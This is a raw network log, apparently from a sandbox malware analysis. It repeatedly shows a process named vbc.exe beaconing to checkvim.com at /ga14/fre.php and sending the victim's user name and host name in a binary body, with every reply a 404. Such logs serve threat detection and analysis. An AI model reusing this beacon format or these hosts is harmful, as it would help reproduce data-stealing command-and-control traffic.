                    Sep 28, 2021 06:51:11.995450020 CEST302OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:12.290452957 CEST302INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:23 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    61192.168.2.22492265.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:12.548479080 CEST303OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:12.619106054 CEST303OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:12.908385992 CEST304INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:24 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    62192.168.2.22492275.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:13.189129114 CEST304OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:13.257479906 CEST305OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:13.544517994 CEST305INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:24 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    63192.168.2.22492285.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:13.815165043 CEST306OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:13.878724098 CEST306OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:14.177795887 CEST306INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:25 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    64192.168.2.22492295.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:14.436115026 CEST307OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:14.509625912 CEST307OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:14.799664974 CEST308INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:26 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    65192.168.2.22492305.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:15.070584059 CEST309OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:15.147994995 CEST309OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:15.439943075 CEST309INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:26 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    66192.168.2.22492315.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:15.726731062 CEST310OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:15.794262886 CEST310OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:16.076317072 CEST311INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:27 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    67192.168.2.22492325.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:16.340414047 CEST311OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:16.403613091 CEST312OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:16.690124035 CEST312INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:28 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    68192.168.2.22492335.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:16.959594965 CEST313OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:17.032018900 CEST313OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:17.307420969 CEST313INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:28 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    69192.168.2.22492345.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:17.590102911 CEST314OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:17.657733917 CEST314OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:17.941711903 CEST315INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:29 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    7192.168.2.22491725.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:36.981513977 CEST228OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:37.051975012 CEST228OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:37.329349995 CEST229INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:48 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    70192.168.2.22492355.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:18.196433067 CEST316OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:18.272052050 CEST316OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:18.572170973 CEST316INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:29 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    71192.168.2.22492365.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:18.836328983 CEST317OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:18.905457973 CEST317OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:19.181425095 CEST317INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:30 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    72192.168.2.22492375.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:19.451087952 CEST318OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:19.522536993 CEST319OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:19.814656973 CEST319INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:31 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    73192.168.2.22492385.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:20.085202932 CEST320OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:20.151999950 CEST320OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:20.478230953 CEST320INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:31 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    74192.168.2.22492395.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:20.743376017 CEST321OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:20.819245100 CEST321OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:21.089638948 CEST322INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:32 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    75192.168.2.22492405.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:21.360940933 CEST322OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:21.434868097 CEST323OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:21.718506098 CEST323INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:33 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    76192.168.2.22492415.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:21.987188101 CEST324OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:22.057816029 CEST324OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:22.352973938 CEST324INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:33 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    77192.168.2.22492425.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:22.613431931 CEST325OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:22.676587105 CEST325OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:22.999511957 CEST326INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:34 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    78192.168.2.22492435.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:23.260700941 CEST327OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:23.328067064 CEST327OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:23.608755112 CEST327INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:34 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    79192.168.2.22492445.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:23.883186102 CEST328OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
